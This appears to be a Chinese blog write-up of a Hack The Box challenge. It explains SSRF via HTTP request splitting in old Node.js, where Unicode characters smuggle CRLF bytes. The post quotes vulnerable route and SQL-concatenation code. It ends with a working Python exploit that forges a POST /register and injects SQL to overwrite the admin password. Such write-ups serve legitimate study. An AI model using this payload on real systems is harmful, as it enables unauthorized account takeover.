Request Splitting

0x01 起因

今天在hack the box上看到一道题,在审计代码之后发现注册路由有个

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
router.post('/register', (req, res) => {

if (req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1') {
return res.status(401).end();
}

let { username, password } = req.body;

if (username && password) {
return db.register(username, password)
.then(() => res.send(response('Successfully registered')))
.catch(() => res.send(response('Something went wrong')));
}

return res.send(response('Missing parameters'));
});

这里应该是用到ssrf去绕过req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1'最先尝试了X-Forwarded-For发现并不能绕过去,然后又看到了api/weather的逻辑是可以用服务器发送get请求的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
const HttpHelper = require('../helpers/HttpHelper');

module.exports = {
async getWeather(res, endpoint, city, country) {

// *.openweathermap.org is out of scope
let apiKey = '10a62430af617a949055a46fa6dec32f';
let weatherData = await HttpHelper.HttpGet(`http://${endpoint}/data/2.5/weather?q=${city},${country}&units=metric&appid=${apiKey}`);

if (weatherData.name) {
let weatherDescription = weatherData.weather[0].description;
let weatherIcon = weatherData.weather[0].icon.slice(0, -1);
let weatherTemp = weatherData.main.temp;

switch (parseInt(weatherIcon)) {
case 2: case 3: case 4:
weatherIcon = 'icon-clouds';
break;
case 9: case 10:
weatherIcon = 'icon-rain';
break;
case 11:
weatherIcon = 'icon-storm';
break;
case 13:
weatherIcon = 'icon-snow';
break;
default:
weatherIcon = 'icon-sun';
break;
}

return res.send({
desc: weatherDescription,
icon: weatherIcon,
temp: weatherTemp,
});
}

return res.send({
error: `Could not find ${city} or ${country}`
});
}
}

但是需要的是去发送post请求,那么怎么样才能让get变post?

0x02 Request Splitting POC

最终找到答案那就是Request Splitting(请求拆分)

这是需要构建的最终请求

1
2
3
4
5
6
POST /register HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin

如何让一个GET请求拥有这样的效果?

这是一个正常的get请求

1
2
3
4
5
6
GET /?city=test HTTP/1.1
Host: 206.189.28.151:31670
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

如果这里请求test的时候我是请求的

1
test HTTP/1.1 \r\n POST /register HTTP/1.1 \r\n Host: 127.0.0.1 \r\n Content-Type: application/x-www-form-urlencoded \r\n Content-Length: 29 \r\n \r\n username=admin&password=admin \r\n GET / HTTP/1.1

那么 这个时候请求就变成了

1
2
3
4
5
6
7
8
9
10
11
12
GET /?city=test HTTP/1.1
POST /register HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

username=admin&password=admin
GET / HTTP/1.1
Content-Length: 29
Host: 206.189.28.151:31670
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

相当于是发了3个请求,但是现在又有一个问题在http库中其实是会把\n\r这些字符给编译了的所以需要绕过

https://www.anquanke.com/post/id/241429

详情在这篇文章

总的来说就是node.js在低版本会自动将字符串转化为latin-1,latin-1会造成Unicode 字符损坏

1
2
3
4
5
6
7
8
9
10
11
12

async register(user, pass) {
// TODO: add parameterization and roll public
return new Promise(async (resolve, reject) => {
try {
let query = `INSERT INTO users (username, password) VALUES ('${user}', '${pass}')`;
resolve((await this.db.run(query)));
} catch(e) {
reject(e);
}
});
}

这里因为admin这个用户存在所以不能直接使用,而在register这个地方这个开发者只是简单的用了拼接,所以直接就可以sql注入

0x03 EXP

这里借用了https://ama666.cn/2021/09/01/SSRF%20Request-Splittingattack/的脚本来进行了攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import requests

url = 'http://138.68.155.238:30819'
username = "admin"
password = "1337') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"
# 对空格、单引号、双引号进行编码
parsedUsername = username.replace(" ", "\u0120").replace("'", "%27").replace('"',"%22")
parsedPassword = password.replace(" ", "\u0120").replace("'", "%27").replace('"',"%22")
contentLength = len(parsedUsername) + len(parsedPassword) + 19

endpoint = '127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u0120'+ str(contentLength) +'\u010D\u010A\u010D\u010Ausername=' + parsedUsername + '&password=' + parsedPassword+ '\u010D\u010A\u010D\u010AGET\u0120/?lol='

r = requests.post(url + '/api/weather', json={ 'endpoint': endpoint, 'city': 'Dallas','country': 'USA'})
print(r.text)

Request Splitting
https://blog.ox0.moe/2023/10/31/Request_Splitting/
作者
xuan
发布于
2023年10月31日
许可协议